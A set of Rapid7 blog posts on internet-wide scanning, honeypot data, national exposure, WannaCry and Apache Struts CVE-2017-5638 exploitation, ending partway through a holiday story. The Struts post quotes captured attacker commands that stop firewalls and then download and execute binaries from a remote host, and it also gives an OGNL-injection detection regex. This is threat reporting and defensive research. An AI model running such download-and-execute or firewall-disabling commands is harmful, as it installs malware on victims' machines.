Rapid7 Blog


Data Mining the Undiscovered Country

Using Internet-scale Research Data to Quantify and Reduce Exposure

It's been a busy 2017 at Rapid7 Labs. Internet calamity struck swiftly and often, keeping us all on our toes and giving us a chance to fully test out the capabilities of our internet-scale research platform. Let's take a look at how two key components of Rapid7 Labs' research platform—Project Sonar and Heisenberg Cloud—came together to enumerate and reduce exposure over the past two quarters. (If reading isn't your thing, we'll cover this in person at today's UNITED talk.)

Project Sonar Refresher

Back in "the day" the internet really didn't need an internet telemetry tool like Rapid7's Project Sonar. This was the extent of what would eventually become the internet, and it literally had a printed directory that held all the info about all the hosts and users. Fast-forward to Q1 2017, where Project Sonar helped identify a few hundred million hosts exposing one or more of 30 common TCP & UDP ports.

Project Sonar is an internet reconnaissance platform. We scan the entire public IPv4 address range (except for addresses on our opt-out list) looking for targets, then perform protocol-level decomposition scans to get an overall idea of "exposure" across many different protocols. In 2016, we began a re-evaluation and re-engineering of Project Sonar that greatly increased the speed and capabilities of our core research-gathering engine. In fact, we now perform nearly 200 "studies" per month, collecting detailed information about the current state of IPv4 hosts on the internet. (Our efforts are not random, and there's more to a study than a quick port hit; new scans often require quite a bit of post-processing engineering, which is why we don't just call them "scans.") Sonar has been featured in over 20 academic papers (see for yourself!) and is a core part of the foundation for many popular talks at security conferences (including 3 at BH/DC in 2017). We share all our scan data through a research partnership with the University of Michigan — https://scans.io. Keep reading to see how you can use this data on your own to help improve the security posture of your organization.

Cloudy With A Chance Of Honeypots

Project Sonar enables us to actively probe the internet for data, but this provides only half the data needed to understand what's going on. Heisenberg Cloud is a sensor network of honeypots developed by Rapid7 and hosted in every region of every major cloud provider (the following figure is an example of Heisenberg's global coverage from three of the providers). Heisenberg agents can run multiple types and flavors of honeypots, from simple tripwires that enable us to enumerate activity to more stealthy ones that are designed to blend in by mimicking real protocols and servers.

All of these honeypot agents are managed through traditional, open source cloud management tools. We collect all agent-level log data using Rapid7's InsightOps tool and collect all honeypot data—including raw PCAPs—centrally on Amazon S3. We have Heisenberg nodes appearing to be everything from internet cameras to MongoDB servers and everything in between. But we're not just looking for malicious activity. Heisenberg also enables us to see cloud and internet service "misconfigurations"—i.e., legit, benign traffic that is being sent to a node that is no longer under the control of the sending organization but likely was at some point.
We see database queries, API calls, authenticated sessions and more, and this provides insight into how well organizations are (or aren't) configuring and maintaining their internet presence.

Putting It All Together

We convert all our data into a columnar storage format called "Parquet" that enables us to use a wide array of large-scale data analysis platforms to mine the traffic. With it, we can cross-reference Sonar and Heisenberg data—along with data from feeds of malicious activity or even, say, current lists of digital coin mining bots—to get a pretty decent picture of what's going on. This past year (to date), we've publicly used our platform to do everything from monitoring Mirai (et al.) botnet activity to identifying and quantifying (many) vulnerable services to tracking general protocol activity and exposure before and after the Shadow Brokers releases. Privately, we've used the platform to develop custom feeds for our Insight platform that help users identify, quantify and reduce exposure. Let's look into a few especially fun and helpful cases we've studied.

Sending Out An S.O.S.

Long-time readers of the Rapid7 blog may remember a post we did on protestors hijacking internet-enabled devices that broadcasters use to get signals to radio towers. We found quite a few open and unprotected devices. What we didn't tell you is that Rapid7's Rebekah Brown worked with the National Association of Broadcasters to get the word out to vulnerable stations. Within 24 hours the scope of the issue was reduced by 50%, and now only a handful (~15%) remain open and unprotected. This is an incredible "win" for the internet, as exposure reduction like this is rarely seen. We used our Sonar HTTP study to look for candidate systems and then performed a targeted scan to see if each device was — in fact — vulnerable. Thanks to the aforementioned re-engineering efforts, these follow-up scans take between 30 minutes and three hours (depending on the number of targets and the complexity of the protocol decomposition). That means that when we are made aware of a potential internet-wide issue, we can get active, current telemetry to help quantify the exposure and begin working with CERTs and other organizations to help reduce risk.

Internet of Exposure

It'd be too easy to talk about the Mirai botnet or stunt-hacking images from open cameras. Let's revisit the exposure of a core component of our nation's commercial backbone: petroleum—specifically, the gas we all use to get around. We've talked about it before, and it's hard to believe (or perhaps not, in this day and age) that such a clunky device can be so exposed. We've shown you we can count these IoThings, but we've taken the ATG (automatic tank gauge) monitoring a step further to show how careless configurations could possibly lead to exposure of important commercial information. Want to know the median number of gas tanks at any given petrol station? We've got an app for that: most stations have 3-4 tanks, but some have many more. This can be sliced-and-diced by street, town, county and even country, since the vast majority of devices provide this information along with the tank counts. How about how much inventory currently exists across the stations? We won't go into the economic or malicious uses of this particular data, but you can likely ponder that on your own. Despite previous attempts by researchers to identify this exposure—with the hopeful intent of raising enough awareness to get it resolved—we continue to poke at this and engage when we can to help reduce this type of exposure.
Think back on this whenever your organization decides to deploy an IoT sensor network and doesn't properly risk-assess the exposure depending on the deployment model and what information is being presented through the interface. But these aren't the only exposed things. We did an analysis of our port 80 HTTP GET scans to try to identify IoT-ish devices sitting on that port, and it's a mess. You can explore all the items we found here, but one worth calling out is a set of 251 buildings—yes, buildings—with their entire building management interface directly exposed to the internet, many without authentication and not even trying to be "sneaky" by using a port other than port 80. It's vital that you scan your own perimeter for this type of exposure (not just building management systems, of course), since it's far easier for something to slip onto the internet than one would expect.

Wiping Away The Tears

Rapid7 was quick to bring hype-free information and help for the WannaCry "digital hurricane" this past year. We've since migrated our WannaCry efforts over to focused reconnaissance of related internet activity following the Shadow Brokers releases. Since WannaCry, we've seen a major uptick in researchers and malicious users looking for SMB hosts (we've seen more than that, but you can read our 2017 Q2 Threat Report for more details). As we work to understand what attackers are doing, we are developing different types of honeypots to enable us to analyze—and perhaps even predict—their intentions. We've done even more than this, but hopefully you get an idea of the depth and breadth of analyses that our research platform enables.

Take Our Data...Please!

We provide some great views of our data via our blog and in many reports, but YOU can make use of our data to help your organization today. Sure, Sonar data is available via Metasploit (Pro) via the Sonar C, but you can do something as simple as:

$ curl -o smb.csv.gz https://scans.io/data/rapid7/sonar.tcp/2017-08-16-1502859601-tcp_smb_445.csv.gz
$ gzcat smb.csv.gz | cut -d, -f4,4 | grep MY_COMPANY_IP_ADDRESSES

to see if you're in one of the study results (a Python version of the same check appears at the end of this post). Some studies you really don't want to show up in include SMB, RDP, Docker, MySQL, MS SQL, and MongoDB. If you're there, it's time to triage your perimeter and work on improving deployment practices. You can also use other Rapid7 open source tools (like dap) and tools we contribute to (such as the ZMap ecosystem) to enrich the data and get a better picture of exposure, focusing specifically on your organization and the threats to you.

Fin

We've got more in store for the rest of the year, so keep an eye (or RSS feed slurper) on the Rapid7 blog as we provide more information on exposure. You can get more information on our studies and suggest new ones via research@rapid7.com.
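For readers who would rather script that check than pipe through cut and grep, here is a minimal Python sketch of the same idea. It assumes, as the shell one-liner above does, that the responding host's IP sits in the fourth comma-separated column of the gzipped study CSV; the network ranges are placeholders you would replace with your own.

```python
#!/usr/bin/env python
"""Check whether any of your address ranges appear in a Sonar TCP study.

A minimal sketch: it assumes (as the shell one-liner above does) that the
responding host's IP address is the fourth comma-separated column of the
gzipped CSV. Adjust the column index if the study layout differs.
"""
import gzip
import ipaddress
import sys

# Hypothetical example ranges; replace with your organization's CIDRs.
MY_NETWORKS = [ipaddress.ip_network(n) for n in ("198.51.100.0/24", "203.0.113.0/24")]

def hits(path, column=3):
    with gzip.open(path, "rt") as fh:
        for line in fh:
            fields = line.rstrip("\n").split(",")
            if len(fields) <= column:
                continue
            try:
                addr = ipaddress.ip_address(fields[column])
            except ValueError:
                continue  # header row or malformed line
            if any(addr in net for net in MY_NETWORKS):
                yield str(addr)

if __name__ == "__main__":
    for ip in hits(sys.argv[1] if len(sys.argv) > 1 else "smb.csv.gz"):
        print(ip)
```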

National Exposure Index 2017

Today, Rapid7 is releasing the second National Exposure Index, our effort to quantify the exposure that nations are taking on by offering public services on the internet—not just the webservers (like the one hosting this blog), but also unencrypted POP3, IMAPv4, telnet, database servers, SMB, and all the rest. By mapping the virtual space of the internet to the physical space where the machines hosting these services reside, we can provide greater understanding of each nation's internet exposure to both active attack and passive monitoring. Even better, we can point to specific regions of the world where we can make real progress on reducing overall risk to critical internet-connected infrastructure.

Measuring Exposure

When we first embarked on this project in 2016, we set out to answer some fundamental questions about the composition of the myriad services being offered on the internet. While everyone knows that good old HTTP dominates internet traffic, we knew that there are plenty of other services being offered that have no business being on the modern internet. Telnet, for example, is a decades-old remote administration service that offers nothing in the way of encryption and is often configured with default settings, a fact exploited by the devastating Mirai botnet attacks of last October. But, as security professionals and network engineers, we couldn't say just how many telnet servers were out there. So we counted them.

Doing Something About It

We know today that there are about 10 million apparent telnet servers on the internet, but that fact alone doesn't do us a lot of good. Sure, it's down 5 million from last year—a 33% drop that can be attributed almost entirely to the Mirai attacks—but this was the result of a disaster that caused significant disruption, not a planned phase-out of an old protocol. So, instead of just reporting that there are millions of exposed, insecure services on the global internet, we can point to specific countries where these services reside. This is far more useful, since it helps the technical leadership in those specific countries get a handle on what their exposure is so they can do something about it. By releasing the National Exposure Index on an annual basis, we hope to track the evolving internet, encourage the wide-scale deployment of more modern, secure, appropriate services, and enable those people in positions of regional authority to better understand their existing, legacy exposure.

Mapping Exposure

We're pretty pleased with how the report turned out, and encourage you to get a hold of it here. We have also created an interactive, global map so you can cut to the statistics that are most important for you and your region. In addition, we're releasing the data that backs the report—which we gathered using Rapid7's Project Sonar—in case you're the sort who wants to do your own investigation. Scanning the entire internet takes a fair amount of effort, and we want to encourage a more open dialogue about the data we've gathered. You're welcome to head on over to scans.io and pick up our raw scanning data, as well as our GitHub repo of the summary data that went into our analysis. If you'd like to collaborate on cutting this data in new and interesting ways, feel free to drop us a line and we'll be happy to nerd out on all things National Exposure with you.
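As a rough illustration of the kind of aggregation behind the rankings (counting responders per country), here is a hedged Python sketch. The input file of responder IPs and the GeoLite2 country database are assumptions made for the example, not artifacts shipped with the report.

```python
"""Tally responding IPs by country, roughly as the exposure rankings do.

A sketch only: it assumes a newline-delimited file of responder IPs (e.g.
extracted from a Sonar telnet study) and a local GeoLite2-Country.mmdb
database; neither file comes from the report itself.
"""
from collections import Counter
import geoip2.database  # pip install geoip2
import geoip2.errors

def count_by_country(ip_file="telnet_responders.txt", mmdb="GeoLite2-Country.mmdb"):
    counts = Counter()
    with geoip2.database.Reader(mmdb) as reader, open(ip_file) as fh:
        for line in fh:
            ip = line.strip()
            if not ip:
                continue
            try:
                counts[reader.country(ip).country.iso_code or "??"] += 1
            except (geoip2.errors.AddressNotFoundError, ValueError):
                counts["??"] += 1
    return counts

if __name__ == "__main__":
    for cc, n in count_by_country().most_common(20):
        print(f"{cc}\t{n}")
```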

WannaCry Update: Vulnerable SMB Shares Are Widely Deployed And People Are Scanning For Them

WannaCry Overview

Last week the WannaCry ransomware worm, also known as Wanna Decryptor, Wanna Decryptor 2.0, WNCRY, and WannaCrypt, started spreading around the world, holding computers for ransom at hospitals, government offices, and businesses. To recap: WannaCry exploits a vulnerability in the Windows Server Message Block (SMB) file sharing protocol. It spreads to unpatched devices directly connected to the internet and, once inside an organization, to machines and devices behind the firewall as well. For full details, check out the blog post: Wanna Decryptor (WannaCry) Ransomware Explained.

Since last Friday morning (May 12), there have been several other interesting posts about WannaCry from around the security community. Microsoft provided specific guidance to customers on protecting themselves from WannaCry. MalwareTech wrote about how registering a specific domain name triggered a kill switch in the malware, stopping it from spreading. Recorded Future provided a very detailed analysis of the malware's code. However, the majority of reporting about WannaCry in the general news has been that while MalwareTech's domain registration has helped slow the spread of WannaCry, a new version that avoids that kill switch will be released soon (or is already here) and that this massive cyberattack will continue unabated as people return to work this week. In order to understand these claims and monitor what has been happening with WannaCry, we have used data collected by Project Sonar and Project Heisenberg to measure the population of SMB hosts directly connected to the internet, and to learn about how devices are scanning for SMB hosts.

Part 1: In which Rapid7 uses Sonar to measure the internet

Project Sonar regularly scans the internet on a variety of TCP and UDP ports; the data collected by those scans is available for you to download and analyze at scans.io. WannaCry exploits a vulnerability in devices running Windows with SMB enabled, which typically listens on port 445. Using our most recent Sonar scan data for port 445 and the recog fingerprinting system, we have been able to measure the deployment of SMB servers on the internet, differentiating between those running Samba (the open source SMB implementation used on Linux and other Unix-like systems) and actual Windows devices running vulnerable versions of SMB. We find that there are over 1 million internet-connected devices that expose SMB on port 445. Of those, over 800,000 run Windows, and — given that these are nodes running on the internet exposing SMB — it is likely that a large percentage of these are vulnerable versions of Windows with SMBv1 still enabled (other researchers estimate up to 30% of these systems are confirmed vulnerable, but that number could be higher).

We can look at the geographic distribution of these hosts using the following treemap (ISO3C labels provided where legible): The United States, Asia, and Europe have large pockets of Windows systems directly exposed to the internet while others have managed to be less exposed (even when compared to their overall IPv4 block allocations). We can also look at the various versions of Windows on these hosts: the vast majority are server-based Windows operating systems, but there is also an unhealthy mix of Windows desktop operating systems in there, some quite old. The operating system version levels also run the gamut of the Windows release history timeline. Using Sonar, we can get a sense for what is out there on the internet offering SMB services.
Some of these devices are researchers running honeypots (like us), and some of these devices are other research tools, but a vast majority represent actual devices configured to run SMB on the public internet. We can see them with our light-touch Sonar scanning, and other researchers with more invasive scanning techniques have been able to positively identify that infection rates are hovering around 2%.

Part 2: In which Rapid7 uses Heisenberg to listen to the internet

While Project Sonar scans the internet to learn about what is out there, Project Heisenberg is almost the inverse: it listens to the internet to learn about scanning activity. Since SMB typically runs on port 445, and the WannaCry malware scans port 445 for potential targets, if we look at incoming connection attempts on port 445 to Heisenberg nodes as shown in Figure 4, we can see that scanning activity spiked briefly on 2017-05-10 and 2017-05-11, then increased quite a bit on 2017-05-12, and has stayed at elevated levels since. Not all traffic to Heisenberg on port 445 is an attempt to exploit the SMB vulnerability that WannaCry targets (MS17-010). There is always scanning traffic on port 445 (just look at the activity from 2017-05-01 through 2017-05-09), but a majority of the traffic captured between 2017-05-12 and 2017-05-14 was attempting to exploit MS17-010 and likely came from devices infected with the WannaCry malware. To determine this, we matched the raw packets captured by Heisenberg on port 445 against sample packets known to exploit MS17-010.

Figure 5 shows the number of unique IP addresses scanning for port 445, grouped by hour between 2017-05-10 and 2017-05-16. The black line shows that at the same time that the number of incoming connections increases (2017-05-12 through 2017-05-14), the number of unique IP addresses scanning for port 445 also increases. Furthermore, the orange line shows the number of new, never-before-seen IPs scanning for port 445. From this we can see that a majority of the IPs scanning for port 445 between 2017-05-12 and 2017-05-14 were new scanners. Finally, we saw scanning activity from 157 different countries in the month of May, and scanning activity from 133 countries between 2017-05-12 and 2017-05-14. Figure 6 shows the top 20 countries from which we have seen scanning activity, ordered by the number of unique IPs from those countries. While we have seen the volume of scans on port 445 increase compared to historical levels, it appears that the surge in scanning activity seen between 2017-05-12 and 2017-05-14 has started to tail off.

So what?

Using data collected by Project Sonar, we have been able to measure the deployment of vulnerable devices across the internet, and we can see that there are many of them out there. Using data collected by Project Heisenberg, we have seen that while scanning for devices that expose port 445 has been observed for quite some time, the volume of scans on port 445 has increased since 2017-05-12, and a majority of those scans are specifically looking to exploit MS17-010, the SMB vulnerability that the WannaCry malware looks to exploit. MS17-010 will continue to be a vector used by attackers, whether from the WannaCry malware or from something else. Please, follow Microsoft's advice and patch your systems. If you are a Rapid7 InsightVM or Nexpose customer, or you are running a free 30-day trial, here is a step-by-step guide on how you can scan your network to find all of the assets in your organization that are potentially at risk.
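For readers who want to reproduce the flavor of the Figure 5 analysis against their own honeypot or firewall logs, here is a small Python sketch. The input format (a chronologically ordered CSV of timestamp and source IP) is an assumption for illustration, not the actual Heisenberg schema.

```python
"""Count unique and never-before-seen source IPs per hour for port 445 traffic.

A sketch of the Figure 5 style analysis. It assumes a CSV of
"ISO8601_timestamp,source_ip" rows, in chronological order, exported from
honeypot or firewall logs; that layout is an assumption for illustration,
not the actual Heisenberg schema.
"""
import csv
from collections import defaultdict
from datetime import datetime

def per_hour_stats(path="port445_connections.csv"):
    seen = set()                 # every source IP observed so far
    uniq = defaultdict(set)      # hour -> unique IPs that hour
    new = defaultdict(set)       # hour -> IPs never seen before that hour
    with open(path, newline="") as fh:
        for ts, src in csv.reader(fh):
            hour = datetime.fromisoformat(ts).strftime("%Y-%m-%d %H:00")
            uniq[hour].add(src)
            if src not in seen:
                new[hour].add(src)
                seen.add(src)
    return uniq, new

if __name__ == "__main__":
    uniq, new = per_hour_stats()
    for hour in sorted(uniq):
        print(f"{hour}  unique={len(uniq[hour]):6d}  new={len(new[hour]):6d}")
```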
Coming Soon

If this sort of information about internet-wide measurements and analysis is interesting to you, stay tuned for the National Exposure Index 2017. Last year, we used Sonar scans to evaluate the security exposure of all the countries of the world based on the services they exposed on the internet. This year, we have run our studies again, we have improved our methodology and infrastructure, and we have new findings to share.

Related:
- Find all of our WannaCry related resources here
- [Blog] Using Threat Intelligence to Mitigate Wanna Decryptor (WannaCry)

Project Sonar - Mo' Data, Mo' Research

Since its inception, Rapid7's Project Sonar has aimed to share the data and knowledge we've gained from our Internet scanning and collection activities with the larger information security community. Over the years this has resulted in vulnerability disclosures, research papers, conference presentations, community collaboration and data. Lots and lots of data.

Thanks to our friends at scans.io, Censys, and the University of Michigan, we've been able to provide the general public free access to much of our data, including:

- 4 years of bi-weekly HTTP GET / studies. Over 6T of data. https://scans.io/study/sonar.http
- ~1 year of bi-weekly HTTPS GET / studies. Over 2T of data. https://scans.io/study/sonar.https
- 3 years and nearly 1000 ~monthly studies of common UDP services. Over 100G of juicy data. https://scans.io/study/sonar.udp
- 4 years, nearly 300G and 1500 bi-weekly studies of the SSL certificates obtained by examining commonly exposed SSL services. https://scans.io/study/sonar.ssl and https://scans.io/study/sonar.moressl
- 3 years and hundreds of ~weekly forward DNS (FDNS) and reverse DNS (RDNS) studies. Nearly 2T of data. https://scans.io/study/sonar.fdns, https://scans.io/study/sonar.fdns_v2, https://scans.io/study/sonar.rdns, and https://scans.io/study/sonar.rdns_v2
- New! zmap SYN scan results for any Sonar TCP study. A little data now, but a lot over time. https://scans.io/study/sonar.tcp

As Project Sonar continues, we will continue to publish our data through the outlets listed above, perhaps in addition to others.

Are you interested in Project Sonar? Are you using this data? If so, how? Interested in seeing additional studies performed? Have questions about the existing studies or how to use or interpret the data? We love hearing from the community! Post a comment below or reach out to us at research [at] rapid7 [dot] com.
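As a quick example of putting one of these datasets to work, the sketch below streams a forward DNS study file and lists names that resolve into your address space. It assumes the JSON-lines layout of the fdns_v2 style data (one object per line with name, type, and value fields); check the study page for the exact schema before relying on it.

```python
"""Find forward-DNS names that resolve into your address space.

A sketch against the sonar.fdns_v2 style datasets, assuming one JSON object
per line with "name", "type", and "value" fields (verify the schema on the
study page before relying on it). Records are gzip-compressed.
"""
import gzip
import ipaddress
import json

MY_NETWORKS = [ipaddress.ip_network("198.51.100.0/24")]  # example range, replace with yours

def names_in_my_space(path):
    with gzip.open(path, "rt") as fh:
        for line in fh:
            try:
                rec = json.loads(line)
            except json.JSONDecodeError:
                continue
            if rec.get("type") != "a":
                continue  # only A records point at IPv4 addresses
            try:
                addr = ipaddress.ip_address(rec.get("value", ""))
            except ValueError:
                continue
            if any(addr in net for net in MY_NETWORKS):
                yield rec["name"], str(addr)

if __name__ == "__main__":
    for name, addr in names_in_my_space("fdns_a.json.gz"):
        print(f"{name} -> {addr}")
```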

Apache Struts Vulnerability (CVE-2017-5638) Exploit Traffic

UPDATE - March 10th, 2017: Rapid7 added a check that works in conjunction with Nexpose's web spider functionality. This check will be performed against any URIs discovered with the suffix ".action" (the default configuration for Apache Struts apps). To learn more about using this check, read this post.

UPDATE - March 9th, 2017: Scan your network for this vulnerability with check id apache-struts-cve-2017-5638, which was added to Nexpose in content update 437200607.

Attacks spotted in the wild

Yesterday, Cisco Talos published a blog post indicating that they had observed in-the-wild attacks against a recently announced vulnerability in Apache Struts. The vulnerability, CVE-2017-5638, permits unauthenticated Remote Code Execution (RCE) via a specially crafted Content-Type value in an HTTP request. An attacker can create an invalid value for Content-Type which will cause vulnerable software to throw an exception. When the software is preparing the error message for display, a flaw in the Apache Struts Jakarta Multipart parser causes the malicious Content-Type value to be executed instead of displayed.

World Wide Window into the Web

For some time now Rapid7 has been running a research effort called Heisenberg Cloud. The project consists of honeypots spread across every region of five major cloud providers, as well as a handful of collectors in private networks. We use these honeypots to provide visibility into the activities of attackers so that we can better protect our customers as well as provide meaningful information to the public in general. Today, Heisenberg Cloud helped provide information about the scope and scale of the attacks on the Apache vulnerability. In the coming days and weeks it will provide information about the evolution and lifecycle of the attacks.

A few words of caution before I continue: please keep in mind that the accuracy of IP physical location here is at the mercy of geolocation databases, and it's difficult to tell who the current 0wner(s) of a host are at any given time. Also, we host our honeypots in cloud providers in order to provide broad samples. We are unlikely to see targeted or other scope-limited attacks.

Spreading malware

We use Logentries to query our Heisenberg data and extract meaningful information. One of the aspects of the attacks is how the malicious traffic has changed over recent days. The graph below shows a 72-hour window in time.

The first malicious requests we saw were a pair on Tuesday, March 7th at 15:36 UTC that originated from a host in Zhengzhou, China. Both were HTTP GET requests for /index.aciton (misspelled) and the commands that they executed would have caused a vulnerable target to download binaries from the attacking server. Here is an example of the commands that were sent as a single string in the Content-Type value:

cd /dev/shm;
wget http://XXX.XXX.XXX.92:92/lmydess;
chmod 777 lmydess;
./lmydess;

I've broken the command into lines to make it easier to read. It's pretty standard for a command injection or remote code execution attack against web servers: basically, move to some place writeable, download code, make sure it's executable, and run it.

After this, the malicious traffic seemed to stop until Wednesday, March 8th at 09:02 UTC when a host in Shanghai, China started sending attacks. The requests differed from the previous attacks.
The new attacks were HTTP POSTs to a couple of different paths and attempted to execute different commands on the victim:

/etc/init.d/iptables stop;
service iptables stop;
SuSEfirewall2 stop;
reSuSEfirewall2 stop;
cd /tmp;
wget -c http://XXX.XXX.XXX.26:9/7;
chmod 777 7;
./7;

This is similar to the prior commands, but this attacker tries to stop the firewall first. The requested binary was not hosted on the same IP address that attacked the honeypot. In this case the server hosting the binary was still alive and we were able to capture a sample. It appears to be a variant of the XOR DDoS family.

Not so innocent

Much like Talos, in addition to the attempts to spread malware, we see some exploitation of the vulnerability to run "harmless" commands such as whois, ifconfig, and a couple of variations that echoed a value. The word harmless is in quotes because though the commands weren't destructive, they could have allowed the originator of the request to determine if the target was vulnerable. They may be part of a research effort to understand the number of vulnerable hosts on the public Internet, or an information-gathering effort as part of preparation for a later attack. Irrespective of the reason, network and system owners should review their environments.

A little sunshine

Based on the traffic we are seeing at this time, it would appear that the bulk of the non-targeted malicious traffic is limited attacks from a couple of sources. This could change significantly tomorrow if attackers determine that there is value in exploiting this vulnerability. If you are using Apache Struts, this would be a great time to review Apache's documentation on the vulnerability and then survey your environment for vulnerable hosts. Remember that Apache products are often bundled with other software, so you may have vulnerable hosts of which you are unaware. Expect Nexpose and Metasploit coverage to be available soon to help with detection and validation efforts. If you do have vulnerable implementations of the software in your environment, I would strongly recommend upgrading as soon as safely possible. If you cannot upgrade immediately, you may wish to investigate other mitigation efforts such as changing firewall rules or network equipment ACLs to reduce risk. As always, it's best to avoid exposing services to public networks if at all possible. Good luck!
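If you want a quick way to triage logs or captured headers while you patch, the following Python sketch flags Content-Type values that look like the OGNL injection pattern described above. It is a crude heuristic of my own, not a Rapid7 detection or an IDS signature, and it will not catch every variant.

```python
"""Flag HTTP requests whose Content-Type header looks like CVE-2017-5638 abuse.

A crude, hedged heuristic for triaging logs or captured headers: exploit
attempts for this bug typically stuff an OGNL expression (e.g. "%{...}" /
"${...}" with ognl/ProcessBuilder references) into the Content-Type value.
Illustrative only; it is no substitute for patching or real IDS rules.
"""
import re
import sys

SUSPICIOUS = re.compile(r"%\{|\$\{|ognl\.|ProcessBuilder|getRuntime\(\)", re.IGNORECASE)

def suspicious_content_type(value: str) -> bool:
    """Return True if a Content-Type header value looks like an OGNL payload."""
    return bool(SUSPICIOUS.search(value)) or len(value) > 512

if __name__ == "__main__":
    # Expects raw Content-Type values on stdin, one per line.
    for lineno, line in enumerate(sys.stdin, 1):
        value = line.strip()
        if suspicious_content_type(value):
            print(f"line {lineno}: possible CVE-2017-5638 probe: {value[:120]}")
```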

12 Days of HaXmas: A HaxMas Carol

(A Story by Rapid7 Labs) Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the "gifts" we want to give back to the community. And while these gifts may not come wrapped with a bow, we hope you enjoy them.

Happy Holi-data from Rapid7 Labs!

It's been a big year for the Rapid7 elves Labs team. Our nigh 200-node strong Heisenberg Cloud honeypot network has enabled us to bring posts & reports such as The Attacker's Dictionary, Cross-Cloud Adversary Analytics and Mirai botnet tracking to the community, while Project Sonar fueled deep dives into National Exposure as well as ClamAV, fuel tanks and tasty, tasty EXTRABACON. Our final gift of the year is the greatest gift of all: DATA! We've sanitized an extract of our November 2016 cowrie honeypot data from Heisenberg Cloud. While not the complete data set, it should be good for hours of fun over the holiday break. You can e-mail research [at] rapid7 [dot] com if you have any questions or leave a note here in the comments. While you're waiting for that to download, please enjoy our little Haxmas tale…

Once upon a Haxmas eve…

CISO Scrooge sat sullen in his office. His demeanor was sour as he reviewed the day's news reports and sifted through his inbox, but his study was soon interrupted by a cheery minion's "Merry HaXmas, CISO!". CISO Scrooge replied, "Bah! Humbug!" The minion was taken aback. "HaXmas a humbug, CISO?! You surely don't mean it!" "I do, indeed…" grumbled Scrooge. "What is there to be merry about? Every day attackers are compromising sites, stealing credentials and bypassing defenses. It's almost impossible to keep up. What's more, the business units and app teams here don't seem to care a bit about security. So, I say it again 'Merry HaXmas?' - HUMBUG!"

Scrooge's minion knew better than to argue and quickly fled to the comforting glow of the pew-pew maps in the security operations center. As CISO Scrooge returned to his RSS feeds, his office lights dimmed and a message popped up on his laptop, accompanied by a disturbing "clank" noise (very disturbing indeed, since he had the volume completely muted). No matter how many times he dismissed the popup it returned, clanking all the louder. He finally relented and read the message: "Scrooge, it is required of every CISO that the defender spirit within them should stand firm with resolve in the face of their adversaries. Your spirit is weary and your minions are discouraged. If this continues, all your security plans will be for naught and attackers will run rampant through your defenses. All will be lost." Scrooge barely finished uttering, "Hrmph. Nothing but a resourceful security vendor with a crafty marketing message. My ad blocker must be misconfigured and that bulb must have burned out." "I AM NO MISCONFIGURATION!" appeared in the message stream, followed by, "Today, you will be visited by three cyber-spirits. Expect their arrivals on the top of each hour. This is your only chance to escape your fate." Then the popup disappeared and the office lighting returned to normal. Scrooge went back to his briefing and tried to put the whole thing out of his mind.

The Ghost of HaXmas Past

CISO Scrooge had long finished sifting through news and had moved on to reviewing the first draft of their PCI DSS ROC[i].
His eyes grew heavy as he combed through the tome until he was startled by a bright green light and the appearance of a slender man in a tan plaid 1970's business suit holding an IBM 3270 keyboard. "Are you the cyber-spirit, sir, whose coming was foretold to me?", asked Scrooge. "I am!", replied the spirit. "I am the Ghost of Haxmas Past! Come, walk with me!" As Scrooge stood up they were seemingly transported to a room full of mainframe computers with workers staring drone-like into green-screen terminals. "Now, this was security, spirit!" exclaimed Scrooge. "No internet…No modems…Granular RACF[ii] access control…" (Scrooge was beaming almost as bright as the spirit!) "So you had been successful securing your data from attackers?", asked the spirit. "Well, yes, but this is when we had control! We had the power to give or deny anyone access to critical resources with a mere series of arcane commands."

As soon as he said this, CISO Scrooge noticed the spirit moving away and motioning him to follow. When he caught up, the scene changed to a cubicle-lined floor filled with desktop PCs. "What about now, were these systems secure?", inquired the spirit. "Well, yes. It wasn't as easy as it was with the mainframe, but as our business tools changed and we started interacting with clients and suppliers on the internet we found solutions that helped us protect our systems and networks and gave us visibility into the new attacks that were emerging.", remarked CISO Scrooge. "It wasn't easy. In fact, it was much harder than the mainframe, but the business was thriving: growing, diversifying and moving into new markets. If we had stayed in a mainframe mindset we'd have gone out of business." The spirit replied, "So, as the business evolved, so did the security challenges, but you had resources to protect your data?" "Well, yes. But, these were just PCs. No laptops or mobile phones. We still had control!", noted Scrooge. "That may be," noted the spirit, "but if we continued our journey, would this not be the pattern? Technology and business practices change, but there have always been solutions to security problems coming at the same pace?" CISO Scrooge had to admit that, as he looked back in his mind, there had always been ways to identify and mitigate threats as they emerged. They may not have always been 100% successful, but the benefits of the "new" to the business were far more substantial than the possible issues that came with it.

The Ghost of Haxmas Present

As CISO Scrooge pondered the spirit's words he realized he was back at his desk, his screen having locked due to the required inactivity timeout. He gruffed a bit (he couldn't understand the 15-minute timeout when you're at your desk, as much as you can't) and fumbled 3 attempts at his overly-complex password to unlock the screen before he was logged back in. His PCI DSS ROC was minimized and his browser was on a MeTube video (despite the site being blocked on the proxy server). He knew he had no choice but to click "play". As he did, it seemed to be a live video of the Mooncents coffee shop down the street buzzing with activity. He was seamlessly transported from remote viewer to being right in the shop, next to a young woman in bespoke, authentic, urban attire, sipping a double ristretto venti half-soy nonfat decaf organic chocolate brownie iced vanilla double-shot gingerbread frappuccino. Amongst the patrons were people on laptops, tablets and phones, many of them conducting business for CISO's company. "Dude.
I am the spirit of Haxmas Present", she said, softly, as her gaze fixated upon a shadowy figure in the corner. CISO Scrooge turned his own gaze in that direction and noticed a hoodie-clad figure with a sticker-laden laptop. Next to the laptop was a device that looked like a wireless access point, and Scrooge could just barely hear the figure chuckling to himself as his fingers danced across the keyboard. "Is that person doing what I think he's doing?", Scrooge asked the spirit. "Indeed," she replied. "He's set up a fake Mooncents access point and is intercepting all the comms of everyone connected to it." Scrooge's eyes got wide as he exclaimed "This is what I mean! These people are just like sheep being led to the shearer. They have no idea what's happening to them! It's too easy for attackers to do whatever they want!"

